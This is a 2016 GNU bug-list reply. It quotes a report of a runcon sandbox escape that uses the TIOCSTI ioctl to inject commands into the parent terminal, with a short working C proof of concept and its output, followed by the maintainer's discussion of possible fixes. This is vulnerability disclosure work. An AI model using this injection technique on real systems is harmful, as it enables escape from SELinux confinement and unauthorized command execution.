[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
bug#24541: runcon tty hijacking via TIOCSTI ioctl
From: |
Pádraig Brady |
Subject: |
bug#24541: runcon tty hijacking via TIOCSTI ioctl |
Date: |
Mon, 26 Sep 2016 11:16:37 +0100 |
User-agent: |
Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Thunderbird/45.2.0 |
On 25/09/16 12:39, address@hidden wrote:
> When executing a program via the runcon utility, the nonpriv session
> can escape to the parent session by using the TIOCSTI ioctl to push
> characters into the terminal's input buffer, allowing an attacker to
> execute arbitrary commands without the SELinux security context.
>
> $ cat test.c
> #include <unistd.h>
> #include <sys/ioctl.h>
>
> int main()
> {
> char *cmd = "id\n";
> while(*cmd)
> ioctl(0, TIOCSTI, cmd++);
> execlp("/bin/id", "id", NULL);
> }
> $ gcc test.c -o test
> $ runcon -t sandbox_t ./test
> id
> uid=1000 gid=1000 groups=1000
> context=unconfined_u:unconfined_r:sandbox_t:s0-s0:c0.c1023
> $ id <--- did not type this
> uid=1000(saken) gid=1000(saken) groups=1000(saken)
> context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
>
> This issue has been recently patched in the SELinux sandbox (CVE-2016-7545):
> https://github.com/SELinuxProject/selinux/commit/acca96a135a4d2a028ba9b636886af99c0915379
There are side effects to that though like not being able to background tasks
etc.?
There collection of links on the issue at https://bugs.debian.org/816320
If setsid was an option, one could use `runcon ... setsid the_command`
though that would be less secure operation by default.
The same issue impacts chroot(1) somewhat also.
I'm not sure of the best fix here.
Pádraig